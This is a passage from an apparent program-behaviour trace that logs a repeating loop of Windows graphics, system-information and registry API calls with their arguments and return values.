(ho=0x1100ca1) returned 1 [0087.843] DeleteObject (ho=0x9f0401d3) returned 1 [0087.843] DeleteObject (ho=0x9d0401d6) returned 1 [0087.843] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.843] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.843] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.843] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.843] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.843] BeginPath (hdc=0x0) returned 0 [0087.843] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.843] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.843] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.843] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.844] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.844] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.844] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.844] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.844] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa00401d3 [0087.844] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x9e0401d6 [0087.844] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ca2 [0087.844] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ca3 [0087.844] CombineRgn (hrgnDst=0x1040ca2, hrgnSrc1=0xa00401d3, hrgnSrc2=0x9e0401d6, iMode=1) returned 1 [0087.844] CombineRgn (hrgnDst=0x1040ca3, hrgnSrc1=0xa00401d3, hrgnSrc2=0x9e0401d6, iMode=4) returned 2 [0087.844] CreateSolidBrush (color=0xff) returned 0x2100ca1 [0087.844] CreateSolidBrush (color=0xff0000) returned 0x1100ca4 [0087.844] DeleteObject (ho=0x1100ca4) returned 1 [0087.844] DeleteObject (ho=0x9e0401d6) returned 1 [0087.844] DeleteObject (ho=0xa00401d3) returned 1 [0087.844] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.844] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.844] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.844] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.844] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.844] BeginPath (hdc=0x0) returned 0 [0087.844] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.844] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.844] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.844] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.844] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.844] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.844] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.844] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.844] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x9f0401d6 [0087.844] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa10401d3 [0087.844] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ca5 [0087.844] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ca6 [0087.845] CombineRgn (hrgnDst=0x1040ca5, hrgnSrc1=0x9f0401d6, hrgnSrc2=0xa10401d3, iMode=1) returned 1 [0087.845] CombineRgn (hrgnDst=0x1040ca6, hrgnSrc1=0x9f0401d6, hrgnSrc2=0xa10401d3, iMode=4) returned 2 [0087.845] CreateSolidBrush (color=0xff) returned 0x2100ca4 [0087.845] CreateSolidBrush (color=0xff0000) returned 0x1100ca7 [0087.845] DeleteObject (ho=0x1100ca7) returned 1 [0087.845] DeleteObject (ho=0xa10401d3) returned 1 [0087.845] DeleteObject (ho=0x9f0401d6) returned 1 [0087.845] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.845] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.845] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.845] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.845] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.845] BeginPath (hdc=0x0) returned 0 [0087.845] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.845] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.845] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.845] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.845] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.845] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.845] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.845] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.845] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa20401d3 [0087.845] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa00401d6 [0087.845] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ca8 [0087.845] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ca9 [0087.845] CombineRgn (hrgnDst=0x1040ca8, hrgnSrc1=0xa20401d3, hrgnSrc2=0xa00401d6, iMode=1) returned 1 [0087.845] CombineRgn (hrgnDst=0x1040ca9, hrgnSrc1=0xa20401d3, hrgnSrc2=0xa00401d6, iMode=4) returned 2 [0087.845] CreateSolidBrush (color=0xff) returned 0x2100ca7 [0087.845] CreateSolidBrush (color=0xff0000) returned 0x1100caa [0087.845] DeleteObject (ho=0x1100caa) returned 1 [0087.845] DeleteObject (ho=0xa00401d6) returned 1 [0087.845] DeleteObject (ho=0xa20401d3) returned 1 [0087.845] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.845] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.845] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.846] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.846] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.846] BeginPath (hdc=0x0) returned 0 [0087.846] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.846] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.846] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.846] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.846] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.846] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.846] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.846] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.846] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa10401d6 [0087.846] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa30401d3 [0087.846] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cab [0087.846] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cac [0087.846] CombineRgn (hrgnDst=0x1040cab, hrgnSrc1=0xa10401d6, hrgnSrc2=0xa30401d3, iMode=1) returned 1 [0087.846] CombineRgn (hrgnDst=0x1040cac, hrgnSrc1=0xa10401d6, hrgnSrc2=0xa30401d3, iMode=4) returned 2 [0087.846] CreateSolidBrush (color=0xff) returned 0x2100caa [0087.846] CreateSolidBrush (color=0xff0000) returned 0x1100cad [0087.846] DeleteObject (ho=0x1100cad) returned 1 [0087.846] DeleteObject (ho=0xa30401d3) returned 1 [0087.846] DeleteObject (ho=0xa10401d6) returned 1 [0087.846] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.846] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.846] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.846] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.846] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.846] BeginPath (hdc=0x0) returned 0 [0087.846] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.846] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.846] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.846] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.846] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.846] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.846] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.846] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.847] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa40401d3 [0087.847] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa20401d6 [0087.847] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cae [0087.847] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040caf [0087.847] CombineRgn (hrgnDst=0x1040cae, hrgnSrc1=0xa40401d3, hrgnSrc2=0xa20401d6, iMode=1) returned 1 [0087.847] CombineRgn (hrgnDst=0x1040caf, hrgnSrc1=0xa40401d3, hrgnSrc2=0xa20401d6, iMode=4) returned 2 [0087.847] CreateSolidBrush (color=0xff) returned 0x2100cad [0087.847] CreateSolidBrush (color=0xff0000) returned 0x1100cb0 [0087.847] DeleteObject (ho=0x1100cb0) returned 1 [0087.847] DeleteObject (ho=0xa20401d6) returned 1 [0087.847] DeleteObject (ho=0xa40401d3) returned 1 [0087.847] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.847] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.847] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.847] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.847] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.847] BeginPath (hdc=0x0) returned 0 [0087.847] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.847] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.847] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.847] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.847] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.847] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.847] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.847] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.847] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa30401d6 [0087.847] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa50401d3 [0087.847] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cb1 [0087.847] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cb2 [0087.847] CombineRgn (hrgnDst=0x1040cb1, hrgnSrc1=0xa30401d6, hrgnSrc2=0xa50401d3, iMode=1) returned 1 [0087.847] CombineRgn (hrgnDst=0x1040cb2, hrgnSrc1=0xa30401d6, hrgnSrc2=0xa50401d3, iMode=4) returned 2 [0087.847] CreateSolidBrush (color=0xff) returned 0x2100cb0 [0087.847] CreateSolidBrush (color=0xff0000) returned 0x1100cb3 [0087.847] DeleteObject (ho=0x1100cb3) returned 1 [0087.848] DeleteObject (ho=0xa50401d3) returned 1 [0087.848] DeleteObject (ho=0xa30401d6) returned 1 [0087.848] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.848] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.848] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.848] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.848] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.848] BeginPath (hdc=0x0) returned 0 [0087.848] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.848] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.848] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.848] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.848] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.848] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.848] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.848] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.848] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa60401d3 [0087.848] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa40401d6 [0087.848] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cb4 [0087.848] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cb5 [0087.848] CombineRgn (hrgnDst=0x1040cb4, hrgnSrc1=0xa60401d3, hrgnSrc2=0xa40401d6, iMode=1) returned 1 [0087.848] CombineRgn (hrgnDst=0x1040cb5, hrgnSrc1=0xa60401d3, hrgnSrc2=0xa40401d6, iMode=4) returned 2 [0087.848] CreateSolidBrush (color=0xff) returned 0x2100cb3 [0087.848] CreateSolidBrush (color=0xff0000) returned 0x1100cb6 [0087.848] DeleteObject (ho=0x1100cb6) returned 1 [0087.848] DeleteObject (ho=0xa40401d6) returned 1 [0087.848] DeleteObject (ho=0xa60401d3) returned 1 [0087.848] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.848] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.848] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.848] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.848] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.848] BeginPath (hdc=0x0) returned 0 [0087.848] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.848] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.848] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.848] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.848] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.848] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.849] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.849] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.849] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa50401d6 [0087.849] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa70401d3 [0087.849] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cb7 [0087.849] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cb8 [0087.849] CombineRgn (hrgnDst=0x1040cb7, hrgnSrc1=0xa50401d6, hrgnSrc2=0xa70401d3, iMode=1) returned 1 [0087.849] CombineRgn (hrgnDst=0x1040cb8, hrgnSrc1=0xa50401d6, hrgnSrc2=0xa70401d3, iMode=4) returned 2 [0087.849] CreateSolidBrush (color=0xff) returned 0x2100cb6 [0087.849] CreateSolidBrush (color=0xff0000) returned 0x1100cb9 [0087.849] DeleteObject (ho=0x1100cb9) returned 1 [0087.849] DeleteObject (ho=0xa70401d3) returned 1 [0087.849] DeleteObject (ho=0xa50401d6) returned 1 [0087.849] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.849] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.849] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.849] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.849] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.849] BeginPath (hdc=0x0) returned 0 [0087.849] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.849] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.849] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.849] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.849] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.849] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.849] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.849] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.849] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa80401d3 [0087.849] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa60401d6 [0087.849] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cba [0087.849] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cbb [0087.849] CombineRgn (hrgnDst=0x1040cba, hrgnSrc1=0xa80401d3, hrgnSrc2=0xa60401d6, iMode=1) returned 1 [0087.850] CombineRgn (hrgnDst=0x1040cbb, hrgnSrc1=0xa80401d3, hrgnSrc2=0xa60401d6, iMode=4) returned 2 [0087.850] CreateSolidBrush (color=0xff) returned 0x2100cb9 [0087.850] CreateSolidBrush (color=0xff0000) returned 0x1100cbc [0087.850] DeleteObject (ho=0x1100cbc) returned 1 [0087.850] DeleteObject (ho=0xa60401d6) returned 1 [0087.850] DeleteObject (ho=0xa80401d3) returned 1 [0087.850] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.850] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, 